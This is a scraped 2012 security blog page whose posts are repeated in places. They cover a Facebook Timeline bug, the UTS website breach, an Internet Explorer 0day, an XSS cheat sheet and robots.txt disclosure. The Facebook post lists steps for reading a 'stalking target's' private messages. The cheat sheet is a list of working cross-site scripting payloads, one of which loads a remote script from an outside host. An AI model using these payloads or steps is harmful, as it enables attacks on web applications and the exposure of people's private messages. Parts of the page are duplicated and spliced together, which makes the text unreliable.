Well, well, well... looks like they've done it again. Facebook has created yet another serious privacy concern for their users, and it appears to be accidental, not deliberate like others (Check-In, I'm looking at you).
This time, the private messages of Facebook users have been exposed to their friends and possibly the world as a result of a bug in the new Timeline system. Thanks to this programming glitch, private messages, juicy conversations, and potential data are just a few clicks away from anyone who may wish to access them. Below are the easy steps to try this for yourself:
1. Go to your stalking targets timeline.
2. Select: 2010 from the date list down the right of the page.
3. Look at the part on their page with the heading: "14 friends posted on Targets's timeline."
4. The "wall posts" on this list are actually private messages (Image below). The replies to them is the conversation.
No doubt, this will result in some very bad press for Facebook and heads will be rolling within the development team. I wouldn't even be particularly surprised to see legal action being taken against the social media giant given the potential for leakage of private information. I can already see celebrity gossip stemming from this very glitch.
All in all, this will just be another nail in the coffin for individual privacy on the internet. How could such a glitchy piece of code be published by such a large corporation? Damned if I know, but one things for sure, it definitely isn't going to end well for Mark Zuckerberg or his clients.
Saturday, 29 September 2012
Monday, 24 September 2012
University of Technology Hacked? Update: UTS Breach, Users notified.
This weekend I decided that I was going to pay a visit to zone-h.org, the website which hackers present their "defacements" of hacked websites. Now, going through the list, it was apparent that most websites hacked weren't big targets and all simply general unsecured sites that were flowing with many vulnerabilities. However, after going through some pages, I found this:
Update: Many people have written articles on this -
http://www.smh.com.au/it-pro/security-it/hackers-breach-deface-uts-website-20120925-26i4j.html#ixzz27TM6GAw6
http://www.zdnet.com/au/hackers-deface-old-uts-system-dump-user-database-7000004694/
They state that they detected the breach and it was an old server. Still scary news though.
University of Technology's servers seemed to have been breached on the 2012-09-22 01:10:38. This was only two days ago.
The server which was defaced was: http://datasearch.uts.edu.au
Looking through this, all I see is a blank page with a single word, "Datasearch". It seems almost as if UTS has covered up their tracks.
Through analysing the hackers message, it seems as if this was a targeted hack based on the text written, "Dear, Ugliest Tower In Sydney. Hire some staff who actually know what they are doing. BTW, I just RM -RFd you bitches. That should teach you a lesson."
Looking through this, all I see is a blank page with a single word, "Datasearch". It seems almost as if UTS has covered up their tracks.
Through analysing the hackers message, it seems as if this was a targeted hack based on the text written, "Dear, Ugliest Tower In Sydney. Hire some staff who actually know what they are doing. BTW, I just RM -RFd you bitches. That should teach you a lesson."
The greets to ASIO, seem to be related or in response to this: http://www.abc.net.au/news/2012-09-21/asio-wants-phone-and-email-data-stored-for-two-years/4272982
Now here comes the scary bit. These hackers have not only breached the servers but they have also released the majority of some sort of staff or user database.
Going further down in the defacement we can see the details of approximately 757 people, all from UTS or linked in some way. These include usernames, passwords, emails and the works. If almost one thousand people were breached from a well known university in Australia, then why the heck has this not been reported, or been dealt with appropriately?
I have my respect for universities, but this is wrong! If a breach were to occur due to the sloppy coding on our end, the first thing I would do would be report this breach out to those affected IMMEDIATELY.
Even though the data dates back to as of 2002, you will be surprised how many people use the same passwords. Even worse, these passwords are all in plain text. How convenient for the hackers?
UTS, I don't know who you hire for your web security, and network security in general. But as for the recent hacks done on popular Australian universities (University of Sydney and UNSW), considering you pride yourself on being a university focused on technology, this is the wrong way to go.
As of yet, it seems this hasn't been blogged yet, and to me, I find that quite appalling that a breach can happen without those being affected about it knowing.
It would seem that people would be getting secure as the days go by, but honestly, it seems as if a) people are lacking in knowledge to secure themselves, or b) Hackers are excelling in breaking through that security.
That all for now,
Shubham
Shubham
Update: Many people have written articles on this -
http://www.smh.com.au/it-pro/security-it/hackers-breach-deface-uts-website-20120925-26i4j.html#ixzz27TM6GAw6
http://www.zdnet.com/au/hackers-deface-old-uts-system-dump-user-database-7000004694/
They state that they detected the breach and it was an old server. Still scary news though.
Labels:
apollo,
asio,
breach,
data leak,
defaced,
passwords,
sql injection,
university of technology,
UTS Hacked,
web security
Tuesday, 18 September 2012
Another 0day in the wild. This time Internet Explorer.
Just recently, the internet experienced a java exploit in the wild. Now, from the same creators, a new 0day has been found affecting internet explorer as a whole. Unlike the Java exploit, which targeted the popular product of Java which has been constantly known for its crappy security, this time, malware engineers have targeted internet explorer, and have been successful.
What I find extremely stupid, is that Eric Romang (http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/) was able to find this 0day located on the SAME server as the previous java 0day. To me, personally, I think that this exploit was not created by the people on that server but was rather distributed or sold for a very high price on the backbones of Russian blackmarkets such as antichat.
A simple diagram explains the simplicity of this vulnerability:
Source (http://labs.alienvault.com)
Microsoft suggest blocking ActiveX controls for now, and to await for the newest Internet Explorer 10 which supposedly fixes this issue. If one were smart however, he would not be using Internet Explorer at all ;)
Other than this, from my observations, this exploit has gone to total waste! Such an exploit in the blackmarkets could be sold for upto 20k a pop. Meaning that the author of this must be absolutely devastated right now.
Why would it cost so much you ask? Because think about this. As an example we shall use Russian monetizers who use malware as their main platform. The process would be exceedingly simple and profitable for them. All they would have to do is, firstly buy this exploit, secondly load their malware onto it, and thirdly buy traffic originating from developing countries such as India, Pakistan and Vietnam which are more likely to use Internet Explorer. After a constant traffic flow from their usual sources, they would have almost a 60-70% infection rate if done in the masses.
Let us calculate this. Let's say, 100k traffic was sent, 50% of this would be 50k, the Russian monetizers would have gained a 50k net in over a week. With that 50k they would be able to mine for bitcoins or simply sell their slaves as socks 5 proxies. The money in this exceeds thousands.
Anyways, enough of my rambling. It was an absolute great find, and unbelievable that the exploit was located on already blacklisted servers (how stupid?). Stay safe, and be smart. Simply don't use Internet Explorer.
P.S To check out a very in depth full analysis of code, I suggest you visit http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/, which has a much more programmatic approach to this 0day. Also, a metasploit module has already been created for this vulnerability.
What I find extremely stupid, is that Eric Romang (http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/) was able to find this 0day located on the SAME server as the previous java 0day. To me, personally, I think that this exploit was not created by the people on that server but was rather distributed or sold for a very high price on the backbones of Russian blackmarkets such as antichat.
A simple diagram explains the simplicity of this vulnerability:
Source (http://labs.alienvault.com)
Microsoft suggest blocking ActiveX controls for now, and to await for the newest Internet Explorer 10 which supposedly fixes this issue. If one were smart however, he would not be using Internet Explorer at all ;)
Other than this, from my observations, this exploit has gone to total waste! Such an exploit in the blackmarkets could be sold for upto 20k a pop. Meaning that the author of this must be absolutely devastated right now.
Why would it cost so much you ask? Because think about this. As an example we shall use Russian monetizers who use malware as their main platform. The process would be exceedingly simple and profitable for them. All they would have to do is, firstly buy this exploit, secondly load their malware onto it, and thirdly buy traffic originating from developing countries such as India, Pakistan and Vietnam which are more likely to use Internet Explorer. After a constant traffic flow from their usual sources, they would have almost a 60-70% infection rate if done in the masses.
Let us calculate this. Let's say, 100k traffic was sent, 50% of this would be 50k, the Russian monetizers would have gained a 50k net in over a week. With that 50k they would be able to mine for bitcoins or simply sell their slaves as socks 5 proxies. The money in this exceeds thousands.
Anyways, enough of my rambling. It was an absolute great find, and unbelievable that the exploit was located on already blacklisted servers (how stupid?). Stay safe, and be smart. Simply don't use Internet Explorer.
P.S To check out a very in depth full analysis of code, I suggest you visit http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/, which has a much more programmatic approach to this 0day. Also, a metasploit module has already been created for this vulnerability.
Saturday, 15 September 2012
XSS Cheat Sheet! Including HTML 5 Vectors.
HTML5 Vectors -
Vectors by Gareth HeyesSome vectors also from HTML5Sec
Regular Vectors from RSnake
HTML5 Web Applications
<input autofocus onfocus=alert(1)>
-------------------------------------------------------------
<select autofocus onfocus=alert(1)>
-------------------------------------------------------------
<textarea autofocus onfocus=alert(1)>
-------------------------------------------------------------
<keygen autofocus onfocus=alert(1)>
-------------------------------------------------------------
<form id="test"></form><button
form="test"
formaction="javascript:alert(1)">X</button>
-------------------------------------------------------------
<body
onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
-------------------------------------------------------------
<video
onerror="javascript:alert(1)"><source></source></video>
-------------------------------------------------------------
<form><button
formaction="javascript:alert(1)">X</button>
-------------------------------------------------------------
<body oninput=alert(1)><input autofocus>
-------------------------------------------------------------
<frameset onload=alert(1)
HTML Web Applications
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
-------------------------------------------------------------
'';!--"<XSS>=&{()}
-------------------------------------------------------------
<SCRIPT>alert('XSS')</SCRIPT> -------------------------------------------------------------
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> -------------------------------------------------------------
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -------------------------------------------------------------
<BASE HREF="javascript:alert('XSS');//"> -------------------------------------------------------------
<BGSOUND SRC="javascript:alert('XSS');"> -------------------------------------------------------------
<BODY BACKGROUND="javascript:alert('XSS');"> -------------------------------------------------------------
<BODY ONLOAD=alert('XSS')>
The fuzzdb including hundreds of XSS vectors.
http://code.google.com/p/fuzzdb/source/browse/trunk/fuzzdb/xss/xss-rsnake.txt?r=42
Labels:
alert,
application,
aspx,
autofocus,
cfm,
cross site scripting,
fuzzdb,
html,
html 5 vectors,
html5,
javascript,
onfocus,
onload,
onprompt,
php,
rsnake,
script,
src,
web security,
xss cheat sheet
Robots.txt files, and why it matters!
Believe it or not, one important factor in web security has gone very unacknowledged. The robots.txt file is used by majority of people in order to disallow the indexing of sensitive files. However, the problem with this is, any one has access to your robots file, and you MUST attempt to make it so that nothing important gets disclosed through it.
Many servers hold files called "robots.txt" in their root directory in order to dictate to search engines what is allowed to be indexed, cached and listed in search results. Furthermore these can be listed with sitemaps in order to specify the URLs that search engines should index.
Now, there's one big flaw from this. Suppose, we had a webmaster called Joe, and he didn't want search engines to index a private directory called "privatedirectory". He'd proceed to list this up on his robots.txt file as this:
How do you make proper robots.txt files? Use sitemaps! Don't list any private or sensitive directories directly in the robots file and also attempt to use the Allow method rather than the Disallow method shown above.
Personally, back in 2009, I was talking to a few blackhats on IRC and I asked them, what is potentially one of the stupidest things that have helped you get through layers of security? They told me that they were pentesting an ISP, and had found an SQL injection that led to the disclosure of admin passwords, were but stuck at this point. They had no idea what the admin directory was, and had tried all types of methods to try and find it, at they end, they had realised that the answer to where it was located was in plain text in the robots file, which had disallowed the indexing of a directory called "/a1d2m3i4n5". This is quite shocking, as not only should an ISP never have SQLi in the first place but they also should NEVER place such sensitive directories in the robots file.
This concludes my ramble on the robots file, I hope it helps you in whatever position you are in.
Many servers hold files called "robots.txt" in their root directory in order to dictate to search engines what is allowed to be indexed, cached and listed in search results. Furthermore these can be listed with sitemaps in order to specify the URLs that search engines should index.
Now, there's one big flaw from this. Suppose, we had a webmaster called Joe, and he didn't want search engines to index a private directory called "privatedirectory". He'd proceed to list this up on his robots.txt file as this:
User-agent: *Have you spotted the flaw? It's bluntly obvious! What if someone simply visited the robots.txt file of any giver server at any given time? That would cause this disclosure of this directory that Joe obviously wished to not disclose.
Disallow:
Disallow: /privatedirectory
How do you make proper robots.txt files? Use sitemaps! Don't list any private or sensitive directories directly in the robots file and also attempt to use the Allow method rather than the Disallow method shown above.
Personally, back in 2009, I was talking to a few blackhats on IRC and I asked them, what is potentially one of the stupidest things that have helped you get through layers of security? They told me that they were pentesting an ISP, and had found an SQL injection that led to the disclosure of admin passwords, were but stuck at this point. They had no idea what the admin directory was, and had tried all types of methods to try and find it, at they end, they had realised that the answer to where it was located was in plain text in the robots file, which had disallowed the indexing of a directory called "/a1d2m3i4n5". This is quite shocking, as not only should an ISP never have SQLi in the first place but they also should NEVER place such sensitive directories in the robots file.
This concludes my ramble on the robots file, I hope it helps you in whatever position you are in.